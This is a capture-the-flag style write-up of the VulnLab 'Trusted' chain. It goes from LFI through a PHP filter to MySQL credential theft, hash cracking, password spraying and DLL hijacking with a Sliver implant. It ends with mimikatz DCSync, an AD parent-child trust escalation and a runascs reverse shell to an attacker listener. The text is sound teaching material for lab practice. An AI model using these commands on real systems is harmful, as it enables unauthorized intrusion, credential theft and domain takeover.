Vulnlab - Trusted Writeup

👾 Chain Overview

This is a writeup of the chain Trusted from VulnLab. This chain was a lot of fun and dealt with some common web attacks, DLL hijacking, and AD trust exploitation.

🔍 Enumeration

I started off with an Nmap scan of the box:

nmap -sV -sC -Pn 10.10.168.5-6
Nmap scan report for 10.10.168.5
Host is up (0.100s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-22 20:09:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-22T20:10:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2024-09-21T20:04:55
|_Not valid after:  2025-03-23T20:04:55
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-09-22T20:09:45+00:00
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-22T20:09:46
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Nmap scan report for 10.10.168.6
Host is up (0.099s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.168.6/dashboard/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-22 20:09:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.168.6/dashboard/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 11
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolOld, SupportsCompression, ConnectWithDatabase, Support41Auth, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, FoundRows, InteractiveClient, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: KGb::Qh:'SMhBSW=j~Z*
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2024-09-21T20:04:57
|_Not valid after:  2025-03-23T20:04:57
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-09-22T20:09:48+00:00
|_ssl-date: 2024-09-22T20:10:03+00:00; -1s from scanner time.
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-22T20:09:54
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 119.55 seconds

I went ahead and added the following hosts to my /etc/hosts file:

trusted.vl
labdc.lab.trusted.vl
trusteddc.trusted.vl

I started by checking out SMB - I wasn’t able to get anonymous or guest access to any shares and SMBv1 is disabled.

🥼 LabDC

👨‍⚖ Web - Manes Winchester Family Law

Since SMB wasn’t fruitful I pivoted to web on the LabDC.

The site proudly exclaims that it’s running XAMPP for Windows 8.1.6 - and is Using PHP.

Dirbing the site I found a couple interesting endpoints.

gobuster dir -w ~/GitHub/SecLists/Discovery/Web-Content/big.txt -u https://10.10.168.6 -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.168.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/lfgberg/GitHub/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 301]
/.htpasswd            (Status: 403) [Size: 301]
/aux                  (Status: 403) [Size: 301]
/cgi-bin/             (Status: 403) [Size: 301]
/com3                 (Status: 403) [Size: 301]
/com2                 (Status: 403) [Size: 301]
/com4                 (Status: 403) [Size: 301]
/com1                 (Status: 403) [Size: 301]
/con                  (Status: 403) [Size: 301]
/dashboard            (Status: 301) [Size: 340] [--> https://10.10.168.6/dashboard/]
/dev                  (Status: 301) [Size: 334] [--> https://10.10.168.6/dev/]
/examples             (Status: 503) [Size: 401]
/favicon.ico          (Status: 200) [Size: 30894]
/img                  (Status: 301) [Size: 334] [--> https://10.10.168.6/img/]
/licenses             (Status: 403) [Size: 420]
/lpt1                 (Status: 403) [Size: 301]
/lpt2                 (Status: 403) [Size: 301]
/nul                  (Status: 403) [Size: 301]
/phpmyadmin           (Status: 403) [Size: 301]
/prn                  (Status: 403) [Size: 301]
/server-status        (Status: 403) [Size: 420]
/server-info          (Status: 403) [Size: 420]
/webalizer            (Status: 403) [Size: 301]
/xampp                (Status: 301) [Size: 336] [--> https://10.10.168.6/xampp/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

I started by checking out /dev.

At the bottom we can see a Latest News section with an interesting note for Eric.

Looks like there’s going to be a database connection string or credentials that we can grab somehow. I forcefully browsed to /db.php (also could’ve found by fuzzing w the .php extension) and we see the string Connected Successfully.

This isn’t super helpful - we need a way to grab the source of this page to see if we can find the database connection string/credentials. We can probably use PHP filters to base64 encode the content - but we need somewhere to use them likely via LFI.

Checking out the URL as we browse to different parts of the site there’s an interesting view parameter: https://10.10.168.6/dev/index.html?view=X.

We can toss a PHP filter in here to Base64 encode the content of db.php allowing us to grab the full source for the file https://10.10.168.6/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php.

<?php 
$servername = "localhost";
$username = "root";
$password = "[REDACTED]";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

Yippee! Some cleartext credentials.

🗃 MySQL

I went ahead and used those credentials to connect to MySQL on the Lab DC.

# Prompts for password
mysql -h [IP] -u root -p

To start I listed out the databases.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| news               |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
6 rows in set (0.11 sec)

News looks cool - lets list tables.

mysql> use news
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------+
| Tables_in_news |
+----------------+
| users          |
+----------------+
1 row in set (0.12 sec)

Users is also generally pretty cool - let’s dump the content and look for creds.

mysql> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | [REDACTED_HASH]                  |
|  2 | Eric       | ewalters     | Walters   | [REDACTED_HASH]                  |
|  3 | Christine  | cpowers      | Powers    | [REDACTED_HASH]                  |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.12 sec)

Who’d have guessed - hashed credentials! These are MD5 - so I tried to give them a crack with hashcat.

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt 

I was able to get one of them to crack, so I made a userlist from the short_handle column, and sprayed against SMB.

nxc smb [LAB DC IP] -p pass.list -u user.list
SMB         10.10.168.6     445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB         10.10.168.6     445    LABDC            [-] lab.trusted.vl\Administrator:[REDACTED] STATUS_LOGON_FAILURE 
SMB         10.10.168.6     445    LABDC            [+] lab.trusted.vl\rsmith:[REDACTED]

Sure enough that popped for rsmith!

👷‍♂ Robert Smith

Now as Robert - we can’t WinRM - so I tried using bloodhound-python to enumerate AD.

No go. DNS issues. I was able to get around them using dnschef, a DNS proxy that can be useful for troubleshooting AD related DNS struggles.

We can use dnschef to proxy our DNS traffic to the Lab DC and make Bloodhound happy.

# in one window
python3 dnschef.py --fakeip [LAB DC IP]

# in another window
bloodhound-python -d 'lab.trusted.vl' -ns 127.0.0.1 -u 'rsmith' -p 'IHateEric2' -c all -dc labdc.LAB.TRUSTED.VL --zip

It looks like we have ForceChangePassword, and can change the password for ewalters.

One way to do this is with RPC.

net rpc password "ewalters" "Password123" -U "lab.trusted.vl"/"rsmith"%"[REDACTED]" -S "[LAB DC IP]"

🐈‍⬛ Eric Walters

Now as ewalters - we can WinRM in with our newly changed password.

*Evil-WinRM* PS C:\Users\ewalters\Desktop> type User.txt
|\---/|
| o_o |
 \_^_/
These are not the flags you're looking for.
Take :robitcat: as compensation :).

Evil. Only time I’ve ever been trolled by VL. I’m in tears.

I’ve been had. I popped two Sliver beacons as ewalters and moved on. I found an interesting file in C:\AVTest:

*Evil-WinRM* PS C:\AVTest> cat readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.

In AVTest there’s a binary C:\AVTest\KasperskyRemovalTool.exe. I’m thinking this could be a DLL Hijacking scenario - I exfiltrated the binary to a Windows machine and ran procmon.

Using Process Monitor we can filter for DLL’s that are searched for and not found - we can then place a malicious DLL where Kaspersky is looking for it to have it be run in the context of whatever user runs Kaspersky.

The program attempts to load KasperskyRemovalToolENU.dll - but it can’t be found. I generated a malicious DLL with Sliver and threw it on disk.

generate --os windows --format shared --mtls [ATTACKER IP]:8443 --arch x86

There’s another user running Kasperky on a schedule - and if we wait we’ll get a new callback as cpowers.

🕴 Christine Powers - DA Extraordinaire

Christine is a Domain Admin - that’s pretty cool. And just as you’d think due to the name of the machine - we have a trust to exploit.

There’s a Parent-Child trust between lab.trusted.vl and trusted.vl. This means that because we’ve compromised the lab domain, we can become an admin on the parent domain as well.

Since we don’t actually have any credentials for Christine, I used mimikatz to dump her NTLM hash.

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:cpowers"

Now we can exploit this trust by hand OR we can use Impacket’s handy dandy raiseChild.py which is made for exactly this scenario. All we have to do is supply credentials for a DA in a child domain and it will DCSync the parent.

raiseChild.py "lab.trusted.vl"/"cpowers" -hashes ":[REDACTED]"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Raising child domain lab.trusted.vl
[*] Forest FQDN is: trusted.vl
[*] Raising lab.trusted.vl to trusted.vl
[*] trusted.vl Enterprise Admin SID is: S-1-5-21-3576695518-347000760-3731839591-519
[*] Getting credentials for lab.trusted.vl
[SNIPPED]

Under the hood this uses the SID History attack to get us a ticket for the Enterprise Admin group on the parent domain, and DCSync automatically.

🔒 EFS - One Final Troll

Now we can WinRM to the main DC as DA - but we’re not actually able to read the final flag.

EFS - or the Windows Encrypting File System is preventing us from viewing the flag. We can evade this using runascs to start a new shell.

# On target
net user administrator Password123
.\runascs.exe administrator 'Password123' cmd.exe -r 10.8.0.230:6969

# On attacker
nc -lvnp 6969
Listening on 0.0.0.0 6969
Connection received on 10.10.211.69 55389
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
VL{[SNIPPED]}
C:\Windows\system32>

Yippee!!